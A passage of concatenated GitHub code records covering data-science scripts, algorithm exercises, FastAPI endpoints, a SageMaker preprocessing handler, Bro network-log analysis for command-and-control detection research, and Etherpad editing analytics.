repeat(overlaps[i])):\n matchs[i] = size[i][1:].index(min(size[i][1:], key=lambda x:abs(x-size[i][0])))\n else:\n matchs[i] = overlaps[i].index(max(overlaps[i]))\n \n return matchs\n\n\ndef weight_age(clustering):\n \n age_w = {}\n for i in clustering.keys():\n age_w[i] = []\n \n X, y, c = clustering[0]\n age_w[0] = [1 for x in range(len(X))]\n \n for i in range(1, len(clustering.keys())):\n X, y, c = clustering[i]\n age_w[i] = age(X, i, age_w[i-1])\n \n return age_w\n\ndef age(X, time, last_w):\n \n weights = [] \n\n aux = 0\n for i in range(len(last_w)):\n weights.append(last_w[i]*0.75)\n aux = i\n\n for i in range(aux+1, len(X)):\n weights.append(1)\n\n return weights\n\n\ndef cluster_index(X, y, clusters):\n clu_index = []\n for i in range(X.shape[0]):\n if(y[i] == clusters):\n clu_index.append(i)\n return clu_index\n\ndef repeat(x): \n _size = len(x) \n repeated = [] \n for i in range(_size): \n k = i + 1\n for j in range(k, _size): \n if x[i] == x[j] and x[i] not in repeated: \n repeated.append(x[i]) \n return repeated ","repo_name":"afonsoMatheus/CETra","sub_path":"monic/.ipynb_checkpoints/monic-checkpoint.py","file_name":"monic-checkpoint.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3087031749","text":"__author__ = 'SUN'\n# 第一次python1\n\n##给我和对手赋值血量和攻击力\nmy_hp = 1000\nmy_power = 200\nyour_hp = 1000\nyour_power = 199\n\n##循环一直为真\nwhile True:\n#这次血量=上次血量-对手攻击力\n my_hp = my_hp - your_power\n your_hp = your_hp - my_power\n#如果谁的血量先小于等于0,就认定为谁输,跳出循环\n if my_hp <= 0:\n print(\"我输了\")\n print(my_hp)\n break\n elif your_hp <= 0:\n print(\"你输了\")\n print(your_hp)\n break","repo_name":"sunybee/homework3","sub_path":"homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18008437542","text":"import numpy as np\nimport pandas as pd\nimport random as rd\nfrom datetime import datetime\nfrom shapely import wkt\n\ndef fill_placeholder_1900(df):\n \"\"\"\n Replace all NaT entries with the year 1900\n \"\"\"\n return df.replace(to_replace=pd.to_datetime('1900'),value=pd.NaT)\n\ndef to_datetime(df):\n \"\"\"\n Convert columns to pandas datetime format\n \"\"\"\n dt_cols = ['CreatedDate','UpdatedDate','ServiceDate','ClosedDate']\n for col in dt_cols:\n df[col] = pd.to_datetime(df[col])\n\ndef fill_placeholder_1900_col(df):\n \"\"\"\n Replace specific NaT entries with the year 1900\n \"\"\"\n dt_cols = ['CreatedDate','UpdatedDate','ServiceDate','ClosedDate']\n for col in dt_cols:\n df[col] = df[col].replace(to_replace=pd.to_datetime('1900'),value=pd.NaT)\n\ndef fill_placeholder_ongoing(df, cols):\n \"\"\"\n Replace ongoing request NaT entries with the year 1900\n \"\"\"\n for col in cols:\n df[col] = df[col].replace(to_replace=pd.NaT, value=datetime.now())\n # df.loc[df[col] == 'NaT', col] = datetime.now()\n\ndef ddiff2days(ddiff):\n \"\"\"\n Convert datetime data to float in number of days\n \"\"\"\n if not pd.isnull(ddiff):\n return pd.Timedelta.total_seconds(ddiff)/(24.*3600)\n else:\n return np.NaN\n\ndef to_points(p):\n if type(p) == float:\n return p\n else:\n return wkt.loads('Point{}'.format(p.replace(',',' ')))\n \ndef to_geom(df):\n df['Location'] = df.Location.apply(to_points)\n\n### --- Initial efforts on data cleanup ---\n\n### 1. ACQUIRE ###\n# Code for automated data download goes here\n\n\n### 2. CLEAN ###\n\n# Load data file from TSV/CSV\n### xNOTE: Can encapsulate this workflow and reapply for each data set\ndfb = pd.read_table('311data2019.tsv',sep='\\t') # For now assume data in this folder\n\n# Format dates as datetime (Time intensive)\ndfb['CreatedDate'] = pd.to_datetime(dfb['CreatedDate'])\ndfb['ClosedDate'] = pd.to_datetime(dfb['ClosedDate'])\ndfb['ServiceDate'] = pd.to_datetime(dfb['ServiceDate'])\n\n# Compute service time\n# New columns: closed_created, service_created\ndfb['closed_created'] = dfb.ClosedDate-dfb.CreatedDate\ndfb['service_created'] = dfb.ServiceDate-dfb.CreatedDate\n\n# drop NA values and reformat closed_created in units of hours\ndfb = dfb[~dfb.closed_created.isna()]\n\n# New column: closed_created in units of days \ndfb['closed_createdD'] = dfb.closed_created / pd.Timedelta(days=1)\n\n# xFUTURE: Geolocation/time clustering to weed out repeat requests\n# xFUTURE: Decide whether ServiceDate or ClosedDate are primary metric\n# xFUTURE: Removal of feedback and other categories\n\n# Save output file \n# xFUTURE: May not be necessary after SQL database established\ndfb.to_pickle('311data-cleaned.gzip')\n\n# xNote: To open: pd.read_pickle('311data-cleaned.gzip')\n\n### 3. INGEST ###\n# Code for addition to SQL database goes here\n\n# ------\n\ndef add_datediff_cols(df):\n \"\"\"\n Create new columns in database\n Not recommended for final product, but useful for experimentation\n \"\"\"\n df['ClosedDiff'] = df.ClosedDate - df.CreatedDate\n df['ServiceDiff'] = df.ServiceDate - df.CreatedDate\n df['ClosedServiceDiff'] = df.ClosedDate - df.ServiceDate\n df['ClosedDiff_Days'] = df.ClosedDiff.apply(ddiff2days)\n df['ServiceDiff_Days'] = df.ServiceDiff.apply(ddiff2days)\n df['ClosedServiceDiff_Days'] = df.ClosedServiceDiff.apply(ddiff2days)\n\ndef combine_coor(dataset):\n \"\"\"\n Processes the raw dataset into workable geospatial coordinates\n Returns a 2D array of Latitude-Longitude coordinates \n dataset: must be lacity's raw 311-call dataset \n \"\"\"\n df = pd.read_csv(dataset).dropna(subset=['Longitude'])\n df = df.head(100)\n\n return np.transpose([df['Latitude'], df['Longitude']])\n\ndef k_init(dataset, k):\n \"\"\"\n Initial step of the k-means algorithm: returns random coordinates as representatives (centroid candidates)\n dataset: path to dataset; must be lacity's raw 311-call dataset \n k: number of desired clusters\n \"\"\"\n data_arr = combine_coor(dataset)\n\n if k > len(data_arr):\n return \"Error: more means than data points\"\n\n index_arr = rd.sample(range(0, len(data_arr)), k)\n k_arr = []\n\n for i in index_arr:\n k_arr.append(data_arr[i])\n \n return k_arr\n\ndef k_means(data_arr, k, reps):\n \"\"\"\n Standard k-means algorithm: returns an updated set of means and corresponding clusters as a 2-element 1D array\n data_arr: array of processed coordinate data\n k: number of desired clusters\n reps: representatives (centroid candidates) of each cluster\n \"\"\"\n\n # Step-1: Clusters every point to the closest centroid \n\n clusters = []\n count = 0\n\n while count < k:\n clusters.append([])\n count += 1\n\n for point in data_arr:\n distance = []\n\n for rep in reps:\n magnitude = np.sqrt(np.absolute(point[0] - rep[0])**2 + np.absolute(point[1] - rep[1])**2)\n distance.append(magnitude)\n\n clusters[np.argmin(distance)].append(point)\n\n # Step-2: Update the centroids based on the clusters\n \n means = []\n\n for cluster in clusters:\n sum_c = [0, 0]\n\n for c in cluster:\n sum_c[0] += c[0]\n sum_c[1] += c[1]\n\n mean = [ci / len(cluster) for ci in sum_c]\n means.append(mean)\n\n return [means, clusters]\n\ndef run_kmeans(dataset, k, manual=False, reps=[], t=1000):\n \"\"\"\n Runs the k-means algorithm, returns a dictionary of mean-cluster pairs\n t: number of times to iterate through the algorithm\n dataset: path to dataset; must be lacity's raw 311-call dataset\n k: number of desired clusters\n manual: random initialization of initial representatives if False; custom initialization if True\n reps: representatives; should be used only if manual=True\n \"\"\"\n data_arr = combine_coor(dataset)\n\n ### Due to the high variance of random initialization, it is recommended in practice to manually set the initial representatives in practice\n\n if manual:\n reps = reps\n else:\n reps = k_init(dataset, k)\n\n runs = 0\n\n while runs < t:\n results = k_means(data_arr, k, reps)\n reps = results[0]\n print(reps, runs)\n runs += 1\n\n for j in range(k):\n results[1][j] = [tuple(p) for p in results[1][j]]\n\n k_clusters = {}\n for i in np.arange(len(results[0])):\n k_clusters[tuple(results[0][i])] = results[1][i]\n\n print(k_clusters.keys())\n return k_clusters\n \n### Example: runs the algorithm using 3 clusters\n\nrun_kmeans('../rawdata/MyLA311_Service_Request_Data_2015.csv', 3)\n\n### Incomplete k-medoids algorithm\n### The K-medoids algorithm forces an existing data point as the centroid\n\n# def medoid_L1 (data, representatives):\n# clusters = []\n# for r in np.arange(len(representatives)):\n# clusters.append([])\n\n# for i in data:\n# dist = []\n\n# for j in representatives:\n# norm_l1 = np.absolute(i[0] - j[0]) + np.absolute(i[1] - j[1])\n# dist.append(norm_l1)\n\n# clusters[np.argmin(dist)].append(i)\n\n# print(clusters)\n# z_min = []\n \n# for ci in clusters:\n# sum_dist = []\n\n# for z in data:\n# sum_cz = 0\n\n# for c in ci:\n# sum_cz += np.absolute(c[0] - z[0]) + np.absolute(c[1] - z[1])\n \n# sum_dist.append(sum_cz)\n\n# z_min.append(data[np.argmin(sum_dist)])\n \n# print(z_min)\n\n# def medoid_L2 (data, representatives):\n# clusters = []\n# for r in np.arange(len(representatives)):\n# clusters.append([])\n\n# for i in data:\n# dist = []\n\n# for j in representatives:\n# norm_l2 = np.sqrt(np.absolute(i[0] - j[0])**2 + np.absolute(i[1] - j[1])**2)\n# dist.append(norm_l2)\n\n# clusters[np.argmin(dist)].append(i)\n\n# print(clusters)\n# z_min = []\n \n# for ci in clusters:\n# sum_dist = []\n\n# for z in data:\n# sum_cz = 0\n\n# for c in ci:\n# sum_cz += np.sqrt(np.absolute(c[0] - z[0])**2 + np.absolute(c[1] - z[1])**2)\n \n# sum_dist.append(sum_cz)\n\n# z_min.append(data[np.argmin(sum_dist)])\n \n# print(z_min)","repo_name":"hackforla/data-science","sub_path":"311-data/papastavrou/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8224,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"44291803456","text":"import sys\ninput=sys.stdin.readline\nnum=int(input())\nlist1=[]\none=num//5\nfor i in range(1,one+1):\n two=num-(5*i)\n if two%3==0:\n three=two//3\n result=i+three\n list1.append(result)\n else:\n if num%3==0:\n list1.append(5001)\n else:\n list1.append(-1)\nfive=num//3\nif num%3==0:\n list1.append(five)\nelse:\n list1.append(-1)\nlist2=[]\nfor i in list1:\n if i>0:\n list2.append(i)\n else:\n continue\nif len(list2)>0:\n print(min(list2))\nelse:\n print(-1)\n\n\n","repo_name":"eugene028/Algorithm","sub_path":"~2021 algorithm/2839.py","file_name":"2839.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4567626667","text":"string = input('Enter a string: ')\nstrLength = len(string)\nlower = \"\"\nupper = \"\"\nlist = [i for i in string]\nfor i in range(len(list)):\n if (list[i] == \" \"):\n continue\n else:\n if (list[i] >= 'A' and list[i] <= 'Z'):\n upper += list[i]\n else:\n lower += list[i]\n\nprint(lower + upper)\n","repo_name":"Emanrz7613/itsc-3155-modules-1-and-2","sub_path":"exercise_1.py","file_name":"exercise_1.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6926121918","text":"from typing import List, Optional\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom ensysmod import crud, model, schemas\nfrom ensysmod.api import deps, permissions\nfrom ensysmod.schemas import OperationRateMax\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=List[schemas.OperationRateMax])\ndef get_all_max_operation_rates(db: Session = Depends(deps.get_db),\n current: model.User = Depends(deps.get_current_user),\n skip: int = 0,\n limit: int = 100) -> List[schemas.OperationRateMax]:\n \"\"\"\n Retrieve all max operation rates.\n \"\"\"\n return crud.operation_rate_max.get_multi(db=db, skip=skip, limit=limit)\n\n\n@router.get(\"/{ts_id}\", response_model=schemas.OperationRateMax)\ndef get_max_operation_rate(ts_id: int,\n db: Session = Depends(deps.get_db),\n current: model.User = Depends(deps.get_current_user)):\n \"\"\"\n Retrieve a max operation rate.\n \"\"\"\n return crud.operation_rate_max.get(db, ts_id)\n\n\n@router.post(\"/\", response_model=schemas.OperationRateMax)\ndef create_max_operation_rate(request: schemas.OperationRateMaxCreate,\n db: Session = Depends(deps.get_db),\n current: model.User = Depends(deps.get_current_user)):\n \"\"\"\n Create a new max operation rate.\n \"\"\"\n component = crud.energy_component.get_by_dataset_and_name(db=db, dataset_id=request.ref_dataset,\n name=request.component)\n if component is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Component {request.component} not found in dataset {request.ref_dataset}!\")\n\n permissions.check_modification_permission(db, user=current, dataset_id=request.ref_dataset)\n\n region = crud.region.get_by_dataset_and_name(db=db, dataset_id=request.ref_dataset, name=request.region)\n if region is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Region {request.region} not found in dataset {request.ref_dataset}!\")\n\n ts = crud.operation_rate_max.get_by_component_and_region(db=db, component_id=component.id, region_id=region.id)\n if ts is not None:\n raise HTTPException(status_code=status.HTTP_409_CONFLICT,\n detail=f\"OperationRateMax for component {component.name} (id {component.id}) and \"\n f\"region {region.name} (id {region.id}) already exists with id {ts.id}!\")\n\n ts_in_base: Optional[List[OperationRateMax]] = crud.operation_rate_max.get_by_component(db=db,\n component_id=component.id)\n if ts_in_base is not None:\n # get maximum length max_operation_rates in ts_in_base\n max_length = 0\n for ts_in in ts_in_base:\n if ts_in.max_operation_rates is not None:\n max_length = max(max_length, len(ts_in.max_operation_rates))\n\n if max_length > 0 and max_length != len(request.max_operation_rates):\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=f\"OperationRateMax for component {component.name} (id {component.id}) has a \"\n f\"length of {max_length}. Your new time series has \"\n f\"{len(request.max_operation_rates)} elements.\")\n\n return crud.operation_rate_max.create(db=db, obj_in=request)\n\n\n@router.put(\"/{ts_id}\", response_model=schemas.OperationRateMax)\ndef update_max_operation_rate(ts_id: int,\n request: schemas.OperationRateMaxUpdate,\n db: Session = Depends(deps.get_db),\n current: model.User = Depends(deps.get_current_user)):\n \"\"\"\n Update a max operation rate.\n \"\"\"\n ts = crud.operation_rate_max.get(db=db, id=ts_id)\n if ts is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"OperationRateMax {ts_id} not found!\")\n permissions.check_modification_permission(db, user=current, dataset_id=ts.component.ref_dataset)\n return crud.operation_rate_max.update(db=db, db_obj=ts, obj_in=request)\n\n\n@router.delete(\"/{ts_id}\", response_model=schemas.OperationRateMax)\ndef remove_max_operation_rate(ts_id: int,\n db: Session = Depends(deps.get_db),\n current: model.User = Depends(deps.get_current_user)):\n \"\"\"\n Delete a max operation rate.\n \"\"\"\n ts = crud.operation_rate_max.get(db=db, id=ts_id)\n if ts is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"OperationRateMax {ts_id} not found!\")\n permissions.check_modification_permission(db, user=current, dataset_id=ts.component.ref_dataset)\n return crud.operation_rate_max.remove(db=db, id=ts_id)\n","repo_name":"NOWUM/EnSysMod","sub_path":"ensysmod/api/endpoints/ts_operation_rate_max.py","file_name":"ts_operation_rate_max.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34855899553","text":"import argparse\nimport io\nimport glob\nimport os\nimport numpy as np\nfrom scipy.io import wavfile\nfrom subprocess import Popen, PIPE\nimport subprocess\nimport shutil\nimport uuid\n\nfrom deepSM import SMData\nimport deepSM.beat_time_converter as BTC\nfrom deepSM import SMDataset\nfrom deepSM import utils, wavutils\n\n\ndef model_fn(model_dir):\n print(\"Loading model\")\n print(\"May want to store hyperparameters in the model fn?\")\n return None\n\n\ndef input_fn(body, content_type):\n # Expects zip file.\n print(f\"Input function: content type: {content_type}. Body type: {type(body)}\")\n \n init_dir = os.getcwd()\n \n temp_dir = str(uuid.uuid1())\n print(\"UUID\", temp_dir)\n \n if os.path.isdir(temp_dir):\n shutil.rmtree(temp_dir)\n \n os.mkdir(temp_dir)\n with open(f'{temp_dir}/tempfile.zip', 'wb') as f:\n f.write(body)\n \n p = Popen(['unzip', f'{temp_dir}/tempfile.zip', '-d', temp_dir], stdout=PIPE, stderr=PIPE)\n print(f'UNZIP {p.communicate()}')\n \n p = Popen(['rm', f'{temp_dir}/tempfile.zip'], stdout=PIPE, stderr=PIPE)\n p.communicate()\n \n print(f'LISTDIR TEMP_DIR', os.listdir(temp_dir))\n new_dir = os.listdir(temp_dir)[0]\n \n print(\"NEW DIR\", new_dir)\n \n print(\"TEMP_DIR/NEW_DIR\", os.listdir(f'{temp_dir}/{new_dir}'))\n \n # Expects audio file and .sm file. Load both into memory.\n # Find audio file name.\n files = os.listdir(f'{temp_dir}/{new_dir}')\n audiofilename = next(filter(lambda x: x[-4:].lower() in ['.mp3', '.ogg', '.wav'], files))\n \n p = Popen(['ffmpeg', '-y',\n '-i', f'{temp_dir}/{new_dir}/{audiofilename}',\n '-ac', '1',\n '-ar', '44100',\n f'{temp_dir}/{new_dir}/tempaudio.wav'\n ], stdout=PIPE, stderr=PIPE)\n \n print(\"FFMPEG\", p.communicate())\n \n _, data = wavfile.read(f'{temp_dir}/{new_dir}/tempaudio.wav')\n data = data / 32767\n \n # Read smfile into memory.\n smfilename = next(filter(lambda x: x[-3:] == '.sm', files))\n songname = smfilename[:-3]\n with open(f'{temp_dir}/{new_dir}/{smfilename}') as f:\n smfile = f.read()\n \n os.chdir(init_dir)\n shutil.rmtree(temp_dir)\n \n print(\"UUID DONE\", temp_dir)\n return (songname, smfile, data)\n \n \ndef predict_fn(raw_data, model):\n # Convert raw wavdata and sm file to processed hdf5 format.\n \n songname, smdata, wavdata = raw_data\n \n sm = SMData.SMFile(songname, smdata, wavdata)\n btc = BTC.BeatTimeConverter(sm.offset, sm.bpms, sm.stops)\n \n # Get difficulties.\n diffs = list(filter(lambda x: x != 'Edit', sm.note_charts.keys()))\n# if drop_diffs is not None:\n# diffs = list(filter(lambda x: x not in drop_diffs, diffs))\n\n notes = {} # Contains only a list of notes for each difficulty.\n times = {} # List of times per diff.\n frames = {}\n # labels = {} # List of note aligned labels for note events. {0, 1} for now.\n\n\n # Track first and last notes for wav padding.\n first_frame = np.inf\n last_frame = -np.inf\n\n # Find note times and frames for alignment to features.\n # Will pad wavfile if first or last note is too close to beginning/end.\n for diff in diffs:\n times[diff], notes[diff] = \\\n btc.gen_time_notes(sm.note_charts[diff].notes)\n\n frames[diff] = btc.align_to_frame(times[diff])\n\n if frames[diff][0] < first_frame:\n first_frame = frames[diff][0]\n if frames[diff][-1] > last_frame:\n last_frame = frames[diff][-1]\n\n front_pad_frames, padded_wav = \\\n wavutils.pad_wav(first_frame, last_frame, sm.wavdata)\n\n\n # Get FFT Transform.\n fft_features = wavutils.gen_fft_features(padded_wav)\n\n # N_channels = 3 (1024, 2048, 4096)\n # N_frames ~ song length * 44100 / 512\n # N_freqs = 80 (Number of mel coefs per frame)\n N_channels, N_frames, N_freqs = fft_features.shape\n\n \n # Get labels (step position and type)\n step_pos_labels = np.zeros((len(diffs), N_frames))\n step_type_labels = np.zeros((len(diffs), N_frames, 4))\n for i, diff in enumerate(diffs):\n # Adjusting for the new frames added on to the front.\n frames[diff] += front_pad_frames\n\n step_pos_labels[i, frames[diff]] = 1\n\n for j, note in zip(frames[diff], notes[diff]):\n step_type_labels[i, j, :] = np.array(list(map(int, note)))\n\n\n smd = SMDataset.SMDataset(\n songname, diffs, fft_features, step_pos_labels, step_type_labels)\n \n return smd\n\ndef output_fn(data, ret_content_type):\n print(\"OUTPUTFUNCTION\")\n \n buf = io.BytesIO()\n buf = data.save(buf)\n \n return buf.getvalue()\n\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser()\n parser.add_argument('--model-dir', type=str, default=os.environ['SM_MODEL_DIR'])\n args = parser.parse_args()\n \n with open(f'{args.model_dir}/model.joblib', 'w') as f:\n f.write('Justin is stoopid')","repo_name":"Vivoe/DeepSM","sub_path":"sagemaker/create_training_dataset.py","file_name":"create_training_dataset.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"14321889378","text":"\"\"\"\nMaster Thesis\nNetwork Monitoring and Attack Detection\n\nbro_main.py\nMain script used for analysing the Bro .log-files.\n\nMain functionalities:\n- Domain-name to IP resolution\n- Gathering flow information accumulated by src-dst IP pairs\n- Labelling the src-IP and dst-IP as internal, unknown internal & external\n\n@author: Nicolas Kaenzig, D-ITET, ETH Zurich\n\"\"\"\n\nimport sys\nsys.path.append('/home/nicolas/.local/lib/python3.5/site-packages')\nimport bro_parsers as ex\nimport time\nimport os\nimport pickle\nimport numpy as np\nimport bro_misc\nimport json\n\n\ndata_path = './data/'\nextracted_path = './extracted/ls17/'\ncs_path = './cobalt_strike/'\n\nlog_path = '/mnt/data/nicolas/bro_logs/ls17/'\nconn_log_name = 'conn.log'\nhttp_log_name = 'http.log'\ndns_log_name = 'dns.log'\ndhcp_log_name = 'dhcp.log'\nsslanalyzer_log_name = 'sslanalyzer.log'\n\nlocal_hosts_csv = 'local_hosts6.csv'\n\n\ndef main():\n if os.path.exists(os.path.join(extracted_path, 'mapping_dicts.pickle')) and \\\n os.path.exists(os.path.join(extracted_path, 'conn_bool_matrix.pickle')) and \\\n os.path.exists(os.path.join(extracted_path, 'conn_properties.pickle')):\n # if os.path.exists(os.path.join(extracted_path, 'mapping_dicts.pickle')):\n\n print('Load pickle files found in {} ...'.format(extracted_path))\n with open(os.path.join(extracted_path, 'mapping_dicts.pickle'), 'rb') as fp:\n mapping_dicts = pickle.load(fp)\n with open(os.path.join(extracted_path, 'conn_bool_matrix.pickle'), 'rb') as fp:\n conn_bool_matrix = pickle.load(fp)\n with open(os.path.join(extracted_path, 'conn_properties.pickle'), 'rb') as fp:\n conn_properties_dict = pickle.load(fp)\n else:\n print('Extract data from {} ...'.format(conn_log_name))\n mapping_dicts, conn_bool_matrix, conn_properties_dict = ex.conn_log_extract(log_name=conn_log_name, log_path=log_path,\n skip_invalid_checksums=True)\n mapping_dicts = {}\n\n print('Loading domain names ...')\n ssl_domain_to_ip_dict, ssl_c_doms = ex.extract_domains(log_name=sslanalyzer_log_name, log_path=log_path)\n http_domain_to_ip_dict, http_c_doms = ex.extract_domains(log_name=http_log_name, log_path=log_path)\n dns_domain_to_ip_dict, dns_c_doms = ex.extract_domains(log_name=dns_log_name, log_path=log_path)\n\n domain_to_ip_dict = bro_misc.merge_domain_dicts(ssl_domain_to_ip_dict, dns_domain_to_ip_dict)\n domain_to_ip_dict = bro_misc.merge_domain_dicts(http_domain_to_ip_dict, domain_to_ip_dict)\n ip_to_domain_dict = bro_misc.create_ip_to_domain_dict(domain_to_ip_dict)\n\n mapping_dicts['domain_to_ip_dict'] = domain_to_ip_dict\n mapping_dicts['ip_to_domain_dict'] = ip_to_domain_dict\n\n print(\"Saving extracted data to {} ...\".format(extracted_path))\n if not os.path.exists(extracted_path):\n os.makedirs(extracted_path)\n\n with open(os.path.join(extracted_path, 'mapping_dicts.pickle'), 'wb') as fp:\n pickle.dump(mapping_dicts, fp)\n with open(os.path.join(extracted_path, 'conn_bool_matrix.pickle'), 'wb') as fp:\n pickle.dump(conn_bool_matrix, fp)\n with open(os.path.join(extracted_path, 'conn_properties.pickle'), 'wb') as fp:\n pickle.dump(conn_properties_dict, fp)\n\n nr_destinations = conn_bool_matrix.shape[1]\n\n bro_misc.get_default_gateway_macs(mapping_dicts, os.path.join('./data', local_hosts_csv))\n\n ### Create .json file holding all malicious IP addresses listed in the cobalt strike reports\n mal_ips = bro_misc.get_all_malicious_ips(os.path.join(cs_path, 'indicatorsofcompromise_IPs.txt'),\n os.path.join(cs_path, 'indicatorsofcompromise_domains.txt'), mapping_dicts)\n mal_ips_dict = {\"malicious_ips\" : list(mal_ips)}\n with open(os.path.join(extracted_path, 'malicious_ips.json'), 'w') as fp1:\n print('Saving malicious ip dictionary to {} ...'.format(extracted_path))\n json.dump(mal_ips_dict, fp1)\n\n ### Write a .json file holding mappings from IP to whether it is external or internal\n _, ip_class_dict = bro_misc.is_internal_or_external_host(mapping_dicts, conn_properties_dict,\n os.path.join(data_path, local_hosts_csv), nr_destinations)\n with open(os.path.join(extracted_path, 'ip_classes.json'), 'w') as fp2:\n print('Saving ip-classes dictionary to {} ...'.format(extracted_path))\n json.dump(ip_class_dict, fp2)\n\n ### Write the extracted connection properties to a .csv file\n bro_misc.write_properties_to_csv(conn_properties_dict, mapping_dicts, nr_destinations, extracted_path)\n bro_misc.add_ip_class_to_snort_csv(data_path, extracted_path, conn_properties_dict, nr_destinations,\n mapping_dicts, ip_class_dict, mal_ips)\n\n ### MISC\n # bro_misc.check_multiple_ips_per_mac(mapping_dicts, split=False)\n # bro_misc.check_connections_within_subnet(conn_bool_matrix, mapping_dicts, conn_properties_dict)\n # subnets = ex.dhcp_log_extract_subnets(log_name=dhcp_log_name, log_path=log_path)\n\n\nif __name__ == \"__main__\":\n start = time.time()\n\n main()\n\n end = time.time()\n print('Execution took {} seconds'.format(end - start))","repo_name":"nkaenzig/CnC-Detection","sub_path":"Sourcecode/bro_main.py","file_name":"bro_main.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"73162332965","text":"# Main file computing the metric and visualizations for Stian's logs\nfrom analytics import operation_builder\nfrom analytics import parser\nimport config\nfrom analytics import Operations\nfrom analytics.visualization import *\n\n\npath_to_db = \"../stian logs/store.csv\"\n# We fetch the elementary operations\nlist_of_elem_ops_per_pad, _ = parser.get_elem_ops_per_pad_from_db(path_to_db, 'stian_logs')\nprint(list_of_elem_ops_per_pad.keys())\nprint(len(list_of_elem_ops_per_pad.keys()))\n\n# The aTextes were used in debug to check whether we had the same results after recomputing the text from the elementary operations\n# TODO remove ?\naTextes = dict()\nwith open(\"../stian logs/store.csv\", encoding='utf-8') as f:\n lines = f.readlines()\nfor line in lines:\n if ',\"{\"\"atext\"\":{\"\"text\"\":\"\"' in line:\n pad = line[len(\"pad:\"):line.find(',\"{\"\"atext\"\":{\"\"text\"\":\"\"')]\n aTextes[pad] = line[line.find(',\"{\"\"atext\"\":{\"\"text\"\":\"\"') + len(',\"{\"\"atext\"\":{\"\"text\"\":\"\"'):line.find(\n '\"\",\"\"attribs\"\":\"\"')]\n\n# We usually study only a subset of the pads so that its faster\nsubset_of_keys = list(list_of_elem_ops_per_pad.keys())[:150]\nnew_list_of_elem_ops_per_pad = dict()\nfor key in subset_of_keys:\n new_list_of_elem_ops_per_pad[key] = list_of_elem_ops_per_pad[key]\n\n# Comment this line if you don't want a subset\nlist_of_elem_ops_per_pad = new_list_of_elem_ops_per_pad\n\n# Uncomment if you want to study a specific pad\n# list_of_elem_ops_per_pad = {\"753268753268753268753268753268753268\": list_of_elem_ops_per_pad[\"753268753268753268753268753268753268\"]}\n\n# We need the elmentary operation sorted. They should be sorted anyway since we sort them when we get them\nlist_of_elem_ops_per_pad_sorted = operation_builder.sort_elem_ops_per_pad(list_of_elem_ops_per_pad)\n\n# We build the operations from the elementary operations\npads, _, elem_ops_treated = operation_builder.build_operations_from_elem_ops(list_of_elem_ops_per_pad_sorted,\n config.maximum_time_between_elem_ops)\n\n# For all the pads, we create the paragraphs, classify the operations and compute their context\nfor pad_name in pads:\n pad = pads[pad_name]\n # create the paragraphs\n pad.create_paragraphs_from_ops(elem_ops_treated[pad_name])\n # classify the operations of the pad\n pad.classify_operations(length_edit=config.length_edit, length_delete=config.length_delete)\n # find the context of the operation of the pad\n pad.build_operation_context(config.delay_sync, config.time_to_reset_day, config.time_to_reset_break)\n\nprint(len(pads))\n# For each pad, we check that by reconstructing it, it is indeed what it should be. We also display the metrics and\n# save visualizations.\nfor pad_name in pads:\n pad = pads[pad_name]\n print(\"PAD:\", pad_name)\n text = pad.get_text()\n # print(text)\n text = text.strip('\\n')\n aText = aTextes[pad_name].replace(\"\\\\n\", \"\\n\").replace('\\\\\"\"', '\"').strip('\\n')\n if text != aText:\n print(\"TEXT:\")\n print(text)\n print(\"aText:\")\n print(aText)\n print(\"With n_elem_ops\", len(pad.get_elem_ops(sorted_=False)))\n\n print('\\nCOLORED TEXT BY AUTHOR')\n print(pad.display_text_colored_by_authors())\n\n # print('\\nCOLORED TEXT BY OPS')\n # print(pad.display_text_colored_by_ops())\n\n print('\\nSCORES')\n print('User proportion per paragraph score', pad.user_participation_paragraph_score())\n print('Proportion score:', pad.prop_score())\n print('Synchronous score:', pad.sync_score()[0])\n print('Alternating score:', pad.alternating_score())\n print('Break score day:', pad.break_score('day'))\n print('Break score short:', pad.break_score('short'))\n print('Overall write type score:', pad.type_overall_score('write'))\n print('Overall paste type score:', pad.type_overall_score('paste'))\n print('Overall delete type score:', pad.type_overall_score('delete'))\n print('Overall edit type score:', pad.type_overall_score('edit'))\n print('User write score:', pad.user_type_score('write'))\n print('User paste score:', pad.user_type_score('paste'))\n print('User delete score:', pad.user_type_score('delete'))\n print('User edit score:', pad.user_type_score('edit'))\n\n display_user_participation(pad, config.figs_save_location)\n display_user_participation_paragraphs_with_del(pad, config.figs_save_location)\n\n # plot the proportion of synchronous writing per paragraphs\n display_proportion_sync_in_paragraphs(pad, config.figs_save_location)\n\n # plot the overall type counts\n display_overall_op_type(pad, config.figs_save_location)\n\n # plot the counts of type per users\n display_types_per_user(pad, 